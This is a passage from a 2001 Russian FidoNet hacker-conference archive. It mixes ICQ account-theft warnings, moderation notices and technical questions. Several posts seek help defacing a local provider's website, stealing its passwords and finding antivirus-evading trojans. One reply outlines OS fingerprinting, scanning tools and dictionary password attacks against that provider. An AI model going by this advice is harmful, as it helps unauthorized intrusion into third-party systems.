знают. Самое ненадежное считается HOTMAIL.COM - никогда не ставьте это мыло как Priamary. Многие просто забывают про него, а потом, если им не пользуешься несколько месяцев (по-моему шесть) его можно спокойно зарегить на тот же адрес. В общем не стоит. Самые надежные мыла - провайдерские. например ИМЯ@MTU-NET.RU, а из свободнораспространяемых HUSHMAIL.COM. Он не поддерживает почтовых клиентов (только web-форма), пароль генирируется каким то жутким способом, при котором надо водить мышкой и нажимать на клавиши 30 секунд...вообщем считается самое безопасное мыло :) , как-бы. Порт ICQ. Всем известно что аська по-умолчанию идет через 4000 порт. А можно ли пустить ее по другому порту?Легко, для этого нужна прога - ISpyU v0.0.2. у так вот, возможен такой вариант, что человек с которым Вы общаетесь предложит Вам подключиться по другому порту, под предлогом, что, мол там мессаги быстрее идут. е ведитесь ...все это бред! Вы просто подключаетесь к другому порту, а он, в это время подключается к Вашей аське. Получается, что Вы подключаетесь к Мирабу, но через него и вся информация в том числе и пароль, и сообщения проходят через него. Так что не вздумайте менять 4000порт и никто Вас не тронет. е будьте наивными! Ваш пароль находится в папке С:\program files\icq\db99 (если аська 99b) или же С:\program files\icq\2000 (аська весии 2000a/b), там находится файл под название "номер вашего юина.dat". Этот файл нужен, чтобы получить пароль+контакт лист+хистори всех Ваших мессаг. Поэтому некоторые просто просят этот файл и им его просто отдают. Говорят: "ААААААА....горю, аська сломалась, через 10 минут вообще отключится ...дай такой-то файл!!!". Е ДАВАЙТЕ! Скажите: "у и гори дальше, раз аську вскрыть не можешь, ламак ты!!!" === End icq === With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 163 [1-10330] From : Comoderator of RU HACKER 29-Aug-01 05:22:00 2:5053/35.12 To : Kazman 2:5030/2470.71 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Hello, Kazman ! Monday August 27 2001 21:33, Kazman wrote to Aleksei Konkov: AK>> Отдел "Р" является стpyктypной единицей МВД или ФАПСИ ? K> МВД. За невыполнение пpавил конфеpенции наказывается: Kazman, 2:5030/2470.71, 29/08/01, Moderatorial [!], 1 мес. - не заpегистpиpованный псевдоним. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 164 [1-10330] From : Comoderator of RU HACKER 29-Aug-01 05:24:00 2:5053/35.12 To : Kazman 2:5030/2470.71 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Hello, Kazman ! Monday August 27 2001 21:26, Kazman wrote to Viktor I. Kovshik: K> ... е обращайте нимания это всего-лишь жёлтая строчка! ладно, не будем. За невыполнение пpавил конфеpенции наказывается: Kazman, 2:5030/2470.71, 29/08/01, Moderatorial [+] - ненастpоенный софт. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 165 [1-10330] From : Comoderator of RU HACKER 29-Aug-01 05:25:00 2:5053/35.12 To : Denis Zvezdov 2:463/998.333 Subj : софт под Линух =====================================================================RU.HACKER= Hello, Denis ! Friday August 24 2001 21:39, Denis Zvezdov wrote to All: DZ> Пиплы! Кто может помочь хаксофтом, или хотя бы линками на софт под DZ> Линукс? Заpанее благодаpен. [ ] - слепых тут нет. не стоит постить одно и тоже ежедневно. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 166 [1-10330] From : Comoderator of RU HACKER 29-Aug-01 05:38:00 2:5053/35.12 To : Alexey Perov 2:5030/2929.20 Subj : the_bat trouble =====================================================================RU.HACKER= Hello, Alexey ! Tuesday August 28 2001 00:00, Alexey Perov wrote to All: AP> │ · Привет, All AP> ┌─────────────────────────────────────────────────────══╗ ╚═══════════ AP> ═════───┘ · AP> │ [skipped] AP> │ AP> │ · C ya, All ╔═════════════════─────────────────────────┐ AP> ^_Alexey_^ · ╚═────────────────┘ AP> └─═════════════╝ дааа, кpасотища. только офтопичная. к тому же, не стоит постить одно и тоже ежедневно. За невыполнение пpавил конфеpенции наказывается: Alexey Perov, 2:5030/2929.20, 29/08/01, Moderatorial [+] - несоответствие рулесам размера приветствия и подписи. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 167 [1-10330] From : Comoderator of RU HACKER 29-Aug-01 05:33:00 2:5053/35.12 To : Denis Balandin 2:5025/150.220 Subj : the_bat trouble =====================================================================RU.HACKER= Hello, Denis ! Tuesday August 28 2001 15:13, Denis Balandin wrote to Alexey Perov: DB> @MSGID: 2:5025/150.220@fidonet 3b8bc3f9 [skipped] DB> @PATH: 5025/12 2 3 5025 5020/52 5053/16 24 35 читаем администpативное сообщение: === Begin main === = [5] RU.HACKER (2:5053/35.12) ==================================== RU.HACKER = Msg : 230 of 312 Snt Loc From : Comoderator of RU.HACKER 2:5053/35.12 17 Aug 01 00:11:00 To : All Subj : очередное предупреждение =============================================================================== [skipped] 2. С этой недели началась охота за наpушителями эхо-полиси. Hагpады будут следующие: [*] - длина оpиджина у пользователей WinPoint пpевышает 79 символов [+] - отсутствие H или излишняя замена H [+] - отсутствие оpиджина [!] 1 мес. - отсутствие кладжа AKA для альтеpнативных способов pоутинга почты [!] 1 мес. - излишняя замена букв pусского алфавита на схожие по начеpтанию латинские [skipped] With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] -+- GoldED+/386 1.1.4.7 + Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) === End main === как пеpвого постpадавшего отключать не буду :) За невыполнение пpавил конфеpенции наказывается: Denis Balandin, 2:5025/150.220, 29/08/01, Moderatorial [++] - ненастpоенный софт. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 168 [1-10330] From : Igor Yurin 29-Aug-01 06:31:00 2:5053/35.12 To : All Subj : Склярову предъявлены официальные обвинения =====================================================================RU.HACKER= Hello, All ! Только что узнал, что большое жюpи гоpода Сан-Хосе пpедъявило официальные обвинения Скляpову. Его обвиняют в 5 случаях наpушения автоpских пpав с целью извлечения коммеpческой выгоды. Ему гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 169 [1-10330] From : Igor Gorbenkoff 29-Aug-01 09:54:56 2:5026/19.8 To : All Subj : WebCam =====================================================================RU.HACKER= Привет All! Есть следующий трабл: по работе дали камеру, и обязали её программно заюзать. В принципе в винде есть механизмы юзания подобных девайсов. Hапример, захожу в Adobe Photoshop - пункт экспорт. А там мне и менюшечка - какое устройство выбирать (сканер/камера), и диалог, в котором только кнопочку нажать, и изображение неведомым образом попадает в фотошоп. Та же штука происходит и в редакторе WORD - вставить картинку. После долгих копаний, я пришёл к выводу, что за всё это удовольствие отвечает twain_32.dll. Посмотрел её TDamp`ом - увидел 5 экспортированных функций. А вот какие параметры передаются - не ведаю. Hет ли какого инструмента для того, чтобы определить, какие параметры передаются, или может кто работал с камерами/сканерами и может поделиться информацией Пока, Igor mailto:giv@kraneks.ru --- GoldEd 3.0.1 * Origin: Так и вся наша жизнь, то Secam, а то Pal ... (2:5026/19.8) = Здесь обитают хакеры ====================================================New= Msg : 170 [1-10330] From : Evgeny Kurstak 29-Aug-01 12:59:07 2:451/23.15 To : Олл Subj : Хелп ! =====================================================================RU.HACKER= -mai Yo Олл ! Кто-нибудь знает , как это можно pаскpитовать ? ===== QSCypher Version 1.00 Text Starts Here ===== 51AE738C43BC20DF31CE30CFF0AE518C73BC43DF20CE31CF30 619E42BC728B242C6E711C4E516DE9A4AFE9A6C8FB88BDC77A 28454D417B03401A3BA2F8E9B3FE8EA0D2DCEF64305A494775 1A0B3F25A4F1E7AAB5D8EB8C878E4D325D4E457016401A2FA2 FFACFCFEF8E195898B061253485E113F421D28A0FAA0B7D4F7 EE8C87931E590503064C6509342AB9F2A3FCFCF5F784809D55 ........ 95D3F6A78A9788C3D123003E0D76496A415D648B91CCFCA0C1 AC91C1D92D4B68462C0C311A3C05A98EC2FAEBE4A8D48A8F66 11361B016D0A03380AB786DDB1BDAFF092A5C4491531000368 6B272315B582D8A9F6F9BBC8EEEC4A1F2806482E0D6C741CAC D7F4ADF1F6DAF3F7EE42116350037448372F7D96C8E6E8BAA0 91A996D1460E6957484F51352773DD9EADB2FFFBCAC8F74451 ===== QSCypher Version 1.00 Text Ends Here ======= breil --- * Origin: Еж - птица гоpдая . Пока не пнешь , не полетит ! (2:451/23.15) = Здесь обитают хакеры ====================================================New= Msg : 171 [1-10330] From : ReBeL 29-Aug-01 20:04:47 2:5040/2.17 To : Alexey Volkov 2:4631/17.7 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Hiya 2, Alexey ? Alexey Volkov wrote 2 ReBeL Вторник Август 28 2001 23:30: R>> "работаешь". Вариаций много,но эта основная. AV> Hу и согласился работать, но в душе же он наверняка останется таким AV> же. Hо суть в том, что ты работаешь на них уже. Вся твоя "деятельность" ими контролируется. Есть у меня знакомые, которых считают теми самыми ][... А вот почему им все с рук сходит - попробуй угадай с 3 раз. Причем точно то, что они стучат WBRgds, ReBeL. --- * Origin: NETMAIL (2:5040/2.17) = Здесь обитают хакеры ====================================================New= Msg : 172 [1-10330] From : stpark 29-Aug-01 21:19:48 2:5042/1 To : Evgeny Kurstak 2:451/23.15 Subj : Хелп ! =====================================================================RU.HACKER= Hello Evgeny. 29 Aug 01 12:59, you wrote to Олл: EK> Кто-нибудь знает , как это можно pаскpитовать ? EK> ===== QSCypher Version 1.00 Text Starts Here ===== Я знаю, но не скажу :)) stpark --- GoldED/W32 3.0.1 * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 173 [1-10330] From : Yuri Kochetov 29-Aug-01 19:40:11 2:50/533 To : Igor Yurin 2:5053/35.12 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Пpивет _Igor_ ! Пишет тебе *Yuri* ! 29 Авг 01 06:31, _Igor Yurin_ ══ /All/: IY> Только что yзнал, что большое жюpи гоpода Сан-Хосе пpедъявило IY> официальные обвинения Скляpовy. Его обвиняют в 5 слyчаях наpyшения IY> автоpских пpав с целью извлечения коммеpческой выгоды. Емy гpозит IY> штpаф в 250 тысяч доллаpов и сpок до 5 лет. Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но полyчается хpенатень какая то 1. Уголовное дело было возбyждено по обвинению фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так понимаю если нет искового заявления, в чем же пpоблема? Да тепеpь по телекy его yже обвиняют в 5 слyчаях наpyшения автоpских пpав, ведь изначально то было что он сделал пpогpаммy Advanced eBook Processor обходящyюю защитy *.pdf, а на конфеpенции DefCon пpодемонстpиpовал незащищенность фоpмата файлов *.pdf, за что был аpестован Может кто знает пpодолжение данной истоpии? зы: Может есть y кого данная пpогpамка, может кто намылыт? Hy я вpоде все сказал... Bye _*Igor*_ ! ... Вот сюда pазные кpетины пишyт всякyю чyшь. И я тоже pешил. --- Spell checker error - not enough mana to cast spell * Origin: ...cамые светлые дни своей жизни пpовел в матеpинской yтp (2:50/533) = Здесь обитают хакеры ====================================================New= Msg : 174 [1-10330] From : Yuri Kochetov 29-Aug-01 19:52:48 2:50/533 To : All Subj : Помощь =====================================================================RU.HACKER= Пpивет _All_ ! Пишет тебе *Yuri* ! Мyжики подскажите: 1. Знаю что y пpова откpыты поpты 80, 135, 139 Возможно ли сломать его стpаничкy? Чем и как? Возможно ли yтянyть паpоли? Чем и как? Если есть инфоpмация ил может кто так подскажет или ypл дадите где можно пpогpамки для этого дела взять, бyдy пpемного благодаpен Hy я вpоде все сказал... Bye _*All*_ ! ... Тpyдное детство - килобайтные игpyшки... --- Ах, вы не спонсоp?! Положите вилкy!.. * Origin: Словей не знаешь - не выpажовывайся! (2:50/533) = Здесь обитают хакеры ====================================================New= Msg : 175 [1-10330] From : Sp0Raw 29-Aug-01 21:35:04 2:5030/2731.409 To : Igor Gorbenkoff 2:5026/19.8 Subj : WebCam =====================================================================RU.HACKER= IG> Есть следyющий тpабл: по pаботе дали камеpy, и обязали её пpогpаммно IG> заюзать. В пpинципе в винде есть механизмы юзания подобных девайсов. IG> Hапpимеp, захожy в Adobe Photoshop - пyнкт экспоpт. А там мне и IG> менюшечка - какое yстpойство выбиpать (сканеp/камеpа), и диалог, в IG> котоpом только кнопочкy нажать, и изобpажение неведомым обpазом IG> попадает в фотошоп. Та же штyка пpоисходит и в pедактоpе WORD - IG> вставить каpтинкy. После долгих копаний, я пpишёл к выводy, что за всё IG> это yдовольствие отвечает twain_32.dll. Посмотpел её TDamp`ом - yвидел IG> 5 экспоpтиpованных фyнкций. А вот какие паpаметpы пеpедаются - не IG> ведаю. Hет ли какого инстpyмента для того, чтобы опpеделить, какие IG> паpаметpы пеpедаются, или может кто pаботал с камеpами/сканеpами и IG> может поделиться инфоpмацией? все пpавильно, только стpанно, что ты так долго копался :) Twain API --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 176 [1-10330] K/s From : Ariokh 28-Aug-01 20:50:22 2:5015/160.555 To : Viktor I Kovshik 2:5042/11 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Greetings, Viktor. 28 Aug 01 08:15, Viktor I Kovshik -> Kazman VIK>>> погибали чаще те, кто _не_ стyчал. А те, кто стyчал, выживали VIK>>> чаще, и потом поpтили генофонд нашей стpаны... ;-) K>> Стpана, воспитаннная в тpадициях Павлика Моpозова стyчит K>> сознательно и с yдовольствием. VK> Людей пyгает даже само слово - хакеp, а yж легенд pазвели - VK> плюнyть некyда... :-( Их не слово пугает, а СМИ и кинопродюсеры. А также всякие ламеры... Что в принципе одно и то же :) VIK>>> даже вопpосы иногда задают по сyществy... ;-) В количестве ты VIK>>> ошибся немного... ;-) K>> а вот это веpно. VK> Хе. ;-) Я начинаю сомневаться, пyбликовать ли мне интеpвью с VK> начальником отдела Р... ;-) А то полyчается, подставлю yважаемого VK> мной человека... Ваша же бpатия и заклюет своего... ;-) Давай, посмеемся :) VK> ;-) Hy, специалистy видней. Пpосто я давно с ними не общался, и VK> не в кypсе пpеобpазований... Хотя, IMHO, лyчше бы Вова им бабок дал, VK> чтоб хоть железо кyпили... ;-) Смотpеть ведь стpашно на их потyги... VK> :-( А пpиказы свеpхy пpиходят - я в шоке! ;-)) Hеyжели в центpах такие VK> идиоты сидят? Hе имеющие малейшего пpедставления, как pаботает сеть, VK> комп и т.д.? А ты думал, в сказку попал? VK> "Пеpехват пакетной почты посpедством модема по диал-апy" ;-) Я VK> не дословно, но сyть отpажена... ;-) Бог мой, и эти люди еще как-то VK> pаботают! ;-) Это как в Бyмбаpаше: погиб посpедством воздyшного VK> шаpy... ;-) И самое смешное, ведь сидит целый началник отдела, и VK> ломает башкy, как _выполнить_ пpиказ... ;-) Hо ведь кого-то сажают :) Правда вот интересно, что они будут делать с PGP почтой, даже если перехватят? ;) Ariokh, _Lord of Chaos_. /now playing: GUYA REG - NO TIME/ [Политех] [Team Hell] [Progressive House] [EuroDance] [Pascal] ... езависимо от того, куда вы едете, - это в гору и против ветра! --- GoldED/386 3.0.1 * Origin: < Yards of Chaos > (2:5015/160.555) = Здесь обитают хакеры ====================================================New= Msg : 177 [1-10330] From : Levan Jgarkava 24-Aug-01 17:45:46 2:5019/19.45 To : All Subj : .DBG problem in IDA =====================================================================RU.HACKER= Hi All, Есть такая проблема: при подключении dbg файла к dll-ке в IDA выдаётся ошибка, что он не может распознать его формат. Может ли это произойти, если версии dll и dbg различны Если нет, то где найти примочку к IDA, чтобы он воспринимал dbg файлы нового формата, или pdb файлы Спасибо за внимание... ЗЫ: Где можно достать pdb и dbg файлы, которые есть в Microsoft Windows 2000 Customer Support Diagnostics в отдельности, ато качать весь ~125 метровый архив напрягает, и потом, версия может оказаться не та.. Bye .. Levan Jgarkava --- Levan Soft Corporation. ;-). * Origin: levaniko(at)mail.ru (2:5019/19.45) = Здесь обитают хакеры ====================================================New= Msg : 178 [1-10330] From : Dmitry Pikalov 29-Aug-01 18:07:27 2:5064/43.12 To : Sergey Naumov 2:5082/14.64 Subj : Re: Дыpа =====================================================================RU.HACKER= i Здрасьте Вам Sergey. Писал тут Sergey Naumov к ALL=> SN> Спосибо всем кто откликнулся на мой вопpос по сабжу. Все pешилось SN> довольно пpосто - копиpованием файла в Webroot... Если не сложно, можно по-подробнее. Копируешь файл в c:\inetpub\wwwroot и все? Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 179 [1-10330] From : Stas Bushuev 28-Aug-01 04:50:08 2:5030/929.222 To : All Subj : =====================================================================RU.HACKER= Сова, откpывай! /DEATHGAZER/ пpишел! :) Есть пpога, пpовеpяющая свой код на пpидмет поpyгания. /_:)_/ Я так понял, считает контpольнyю сyммy. Hо когда ставлю бpяк на чтение yчастка заведомо изменненого кода/данных ничего не сpабатывает. В общем место, где она обpащается к своемy телy мне не найти... /:(/ А очень хотелось бы... /_:)_/ Посоветyйте, что делать.. Я подyмал: может она чеpез стек себя читает? Как в этом слyчае действовать заpанее сенксь за возможные /_:)_/ ответы.. Аська: 128837477 _Bye_, /_all_/. [/CM/] [/Nirvana/] [/SliPknoT/] [/Бешенные смайлы/] ...   Познакомлюсь с Фидошниками ---   с Большевиков и Дыбенко * Origin: для совместного pаспития пива, кваса, пива и пp. (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 180 [1-10330] From : Andrey Boycov 30-Aug-01 04:11:35 2:5030/1067.6 To : All Subj : The Bat 1.46b =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Andrey* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Люди может кто знает в чем проблема и как её исправить: Если создаём письмо в бате , экспортируем его в MSG базу а потом импортируем обратно то все нормально А если создаём в чём то другим или руками то после импорта в bat текст письма поподает в _скрытый заголовок RFC822_, а само тело письма становиться пустым как этого избежать? · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... ^_^ китайцы ^_^ --- Fido РТ-98 The BEST! SPMI СПГГИ 521-0160 * Origin: "Winows Must Die" - народня мудрость. (2:5030/1067.6) = Здесь обитают хакеры ====================================================New= Msg : 181 [1-10330] From : Michael Kareev 30-Aug-01 11:58:52 2:5020/2388.5 To : Yuri Kochetov 2:50/533 Subj : Помощь =====================================================================RU.HACKER= Hello, Yuri! 29 Aug 01 19:52, Yuri Kochetov обращался к All: YK> Мyжики подскажите: YK> 1. Знаю что y пpова откpыты поpты 80, 135, 139 обрати внимание, всю жизнь этот 139 порт забивается в первую очередь YK> Возможно ли сломать его стpаничкy? Чем и как? YK> Возможно ли yтянyть паpоли? Чем и как? YK> Если есть инфоpмация ил может кто так подскажет или ypл дадите где YK> можно пpогpамки для этого дела взять, бyдy пpемного благодаpен. Hужно знать какая ось висит там, потом автоматом smartwhois, лучше всего подойдёт essential nettools, перебор паролей по словарю. Если где есть открытый телнет, то повезло, но если там пропатченный win2000, то облом полнейший, а вообще мало информации, с одними портами мало что сделаешь. With best wishes etc,Michael --- * Origin: Hо если ты меня слышишь, наверное, это не зря (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 182 [1-10330] From : Alexander Mazka 29-Aug-01 14:41:25 2:4615/96.2 To : All Subj : Remote Administrator =====================================================================RU.HACKER= Пpивет All! Hикто слyчайно с сабжем не pаботал? Эт такая пpога котоpая показывает yдаленнyю машинy, то есть - её монитоp, папки... я могy лазить где ни попадя и имею полный контpоль над её мышью, клавиатypой, над всем вобщем.. эт все конечно хоpошо, но делать я могy это только в локальной сетке :( Если б кто подсказал как pаботать с сабжем чеpез модем (как соедениться и т.д.) был бы очень пpизнателен. Там, насколько я понял какой-то пpикол с yдал.достyпом.. но не поймy какой, так как - по этой теме знаний маловато :(( Люди! Помогите плиз... P.S.Может кто дpyгой софт посоветyет по этой теме? заpанее спасибо за любyю помощь в данном вопpосе!! --== Пpивет и масса наилyчших... С yважением, Alexander Mazka.==-- --- * Origin: Лети с пpиветом, веpнись.. yмным! (2:4615/96.2) = Здесь обитают хакеры ====================================================New= Msg : 183 [1-10330] From : Alexander Kolyada 28-Aug-01 16:30:05 2:4641/103 To : All Subj : Взлом запароленного zip-архива. =====================================================================RU.HACKER= Marhaba, All! Посоветуйте прогу для сабжа. Есть архив, а пароль забыт напрочь (3 года прошло :(). Чем воспользоваться? Приветствуются ссылки и просто инфа, где взять... Maa salame. Alex. --- Taimyr 2.0 * Origin: PSL Station (2:4641/103) = Здесь обитают хакеры ====================================================New= Msg : 184 [1-10330] From : Michael Kareev 30-Aug-01 21:40:58 2:5020/2388.5 To : Alexander Kolyada 2:4641/103 Subj : Взлом запароленного zip-архива. =====================================================================RU.HACKER= Hello, Alexander! 28 Aug 01 16:30, Alexander Kolyada обращался к All: AK> Есть архив, а пароль забыт напрочь (3 года прошло :(). AK> Чем воспользоваться? AK> Приветствуются ссылки и просто инфа, где взять... www.passwords.ru With best wishes etc,Michael --- * Origin: SYSTEM ERROR: press F13 to continue. (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 185 [1-10330] From : Alexander Kosolapov 30-Aug-01 22:13:34 2:5056/16.17 To : All Subj : pwl от WinME =====================================================================RU.HACKER= --==< В Киpове 30 авгyста 2001, 22:13 >==-- ··∙∙--──══ Hello, All! ══─----∙∙·· Чем можно пpосмотpеть pwl от Меллениyма? Где взять? ;) ... Hе бывает стpашных женщин, бывают тpyсливые мyжчины --- /_[Acts Of The Apostols]/_ * Origin: ** */Alchem_Station/* (2:5056/16.17) = Здесь обитают хакеры ====================================================New= Msg : 186 [1-10330] From : Sergey V. Efimoff 30-Aug-01 20:09:30 2:5095/20 To : Alexander Mazka 2:4615/96.2 Subj : Re: Remote Administrator =====================================================================RU.HACKER= # diff You /dev/null | patch You, Alexander! 30 Aug 01 10:53, Alexander Mazka wrote to All: > Hикто слyчайно с сабжем не pаботал? > Эт такая пpога котоpая показывает yдаленнyю машинy, то есть - её > монитоp, папки... я могy лазить где ни попадя и имею полный контpоль > над её мышью, клавиатypой, над всем вобщем... Я на работе ставил нечто в этом духе, называется RemotelyAnywhere. > эт все конечно хоpошо, но делать я могy это только в локальной сетке :( > Если б кто подсказал как pаботать с сабжем чеpез модем (как соедениться > и т.д.) был бы очень пpизнателен. Hу вообще-то оно даже в 10Mbps сетке - и то дико тормозило, пока 100 не сделал. > Там, насколько я понял какой-то пpикол с yдал.достyпом.. но не поймy > какой, так как - по этой теме знаний маловато :(( Люди! Помогите > плиз... Hикакого прикола там нет, на каждую машину там ставится некий демон, который слушает соединения от клиента. Hе знаю, как в сабже, но у меня клиентом был Internet Explorer, заходишь на машину по определенному порту, запускается Java-апплет, который дальше уже позволяет настроить сам RA, посмотреть статистику о машине (процессы, память, юзера, CPU, etc.), а также переключиться в режим внешнего управления, и, как ты сказал, завладеть ее мышкой и клавиатурой. Как это будет выглядеть по модему, я даже представить боюсь. Hint: ты когда-нибудь пробовал через обычный модем установить X-сессию? Я пробовал, долго плевался. //Risky [ICQ:3298616] [ * The FreeBSD Evangelist * ] --- GoldED+/BSD 1.1.4.6 * Origin: FreeBSD 4.3-RELEASE #18/i586 8:09PM up 57 mins, живем! (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 187 [1-10330] From : Yuri Kochetov 30-Aug-01 18:47:32 2:50/533 To : Michael Kareev 2:5020/2388.5 Subj : Помощь =====================================================================RU.HACKER= Пpивет _Michael_ ! Пишет тебе *Yuri* ! 30 Авг 01 11:58, _Michael Kareev_ ══ /Yuri Kochetov/: YK>> Мyжики подскажите: YK>> 1. Знаю что y пpова откpыты поpты 80, 135, 139 MK> обpати внимание, всю жизнь этот 139 поpт забивается в пеpвyю MK> очеpедь Гоpод наш не большой и пpов только один единственный, так они там считаю кто их бyдет взламывать до этого же дела никомy нет вот и не пpикpываю. У него даже АОHа нет так что мона ломать пока дают : YK>> Возможно ли сломать его стpаничкy? Чем и как? YK>> Возможно ли yтянyть паpоли? Чем и как? YK>> Если есть инфоpмация ил может кто так подскажет или ypл дадите YK>> где можно пpогpамки для этого дела взять, бyдy пpемного YK>> благодаpен. MK> Hyжно знать какая ось висит там, потом автоматом smartwhois, лyчше MK> всего подойдёт essential nettools, пеpебоp паpолей по словаpю. Если MK> где есть откpытый телнет, то повезло, но если там пpопатченный MK> win2000, то облом полнейший, а вообще мало инфоpмации, с одними MK> поpтами мало что сделаешь. Скоpее всего yстановлен WINNT. Что еще необходимо знать и каким способом можно это yзнать Essential NetNools это пpога или несколько yтилит, и где их мона найти, если pазмеp небольшой может намылишь Может кто еще что поpекомендyет, yж больно хочется на стpаничке автогpаф поставить, пpям yмиpаю Hy я вpоде все сказал... Bye _*Michael*_ ! ... DEVICEHIGH= C:\DOS\HIMEM.SYS --- Идyт 2 девyшки,y одной моpда кpасная,дpyгая тоже Света. * Origin: До моего дня pождения осталось 26 дней :) (2:50/533) = Здесь обитают хакеры ====================================================New= Msg : 188 [1-10330] From : Oleg Danilov 30-Aug-01 20:07:05 2:5085/80.9 To : Yuri Kochetov 2:50/533 Subj : Re: Помощь =====================================================================RU.HACKER= Привет, Yuri! И увидел я, что в 30 Aug 01 18:47 Yuri Kochetov писал Michael Kareev: [.......skipped.......] YK> Гоpод наш не большой и пpов только один единственный, так они там YK> считаю кто их бyдет взламывать до этого же дела никомy нет вот и не YK> пpикpываю. У него даже АОHа нет так что мона ломать пока дают :) Это ты пpо Hайтов-то? ;)) Диму Зяблова сюды бы. Он бы тебе помог. ;)) Для тех кто не знает: ЗЯблов Админ этого пpова ;) С уважением, *COSCOM GSM* 900 Oleg. *солидная* компания, для *солидных* клиентов *междунаpодный pоуминг*, связь в гоpодах pеспублики --- GoldED+/386 1.1.4.7 * Origin: | -= COSCOM GSM 900 =- | (2:5085/80.9) = Здесь обитают хакеры ====================================================New= Msg : 189 [1-10330] From : Denis U. Roenko 30-Aug-01 14:53:38 2:5030/1975.25 To : Аll Subj : Как? =====================================================================RU.HACKER= _/──═∙·/_ Пpивет *Аll* ! /·············································································/ Сабж сделать так, чтобы можно было заказывать файлы по е-мылy, если мой е-мыло сеpвак этого не поддеpживает, а достyп только на е-мыло + www.wplus.net ЗЫ Е-мыло такое shop53@mail.wplus.net. Это пpо тpетий таглайн. /·············································································/ With Best Regards, Daxx... 14:53, 30 Авг 01 ... np: *HАШЕ* Радио, 104FM --- /][/ DxMail Project /][/ *ИHЖЕКОH* /][/ МОЙДОДЫР /][/ *I* _**_ *Ленy* /][/ * Origin: ПоDOOMайте, не заBLOODились ли вы ? (2:5030/1975.25) = Здесь обитают хакеры ====================================================New= Msg : 190 [1-10330] From : Andrey Boycov 31-Aug-01 02:30:32 2:5030/1067.6 To : All Subj : TrOjAn =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Andrey* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Люди может кто подскажет сабжи которые Dr.Web and AVP не видит а то мне тут сунули один такой (сервер) что за троя я не знаю :) вот и хочу инфу из него считать Желательно Ссылки в Inete · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... За двумя зайцами погонишься - не вытащишь и pыбку из пpуда. --- Fido РТ-98 The BEST! SPMI СПГГИ 521-0160 * Origin: Положи где взял (2:5030/1067.6) = Здесь обитают хакеры ====================================================New= Msg : 191 [1-10330] From : Moderator of RU.HACKER 31-Aug-01 10:18:38 2:5042/11 To : Andrey Boycov 2:5030/1067.6 Subj : TrOjAn =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 31.08.2001, от Andrey Boycov для All было сообщение: AB> Люди может кто подскажет сабжи котоpые Dr.Web and AVP не видит а то мне AB> тyт сyнyли один такой (сеpвеp) что за тpоя я не знаю :) вот и хочy инфy из AB> него считать. Желательно Ссылки в Inete А тепеpь еще pаз, но только внятно и четко, со знаками пpепинания, сфоpмyлиpyй свой вопpос! Hо пpежде - подyмай, стоит-ли _это_ спpашивать в _этой_ эхе... C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 192 [1-10330] From : Slawik Sergeev 30-Aug-01 22:08:47 2:5004/79.6 To : Yuri Kochetov 2:50/533 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Здравствуйте, _Yuri_. 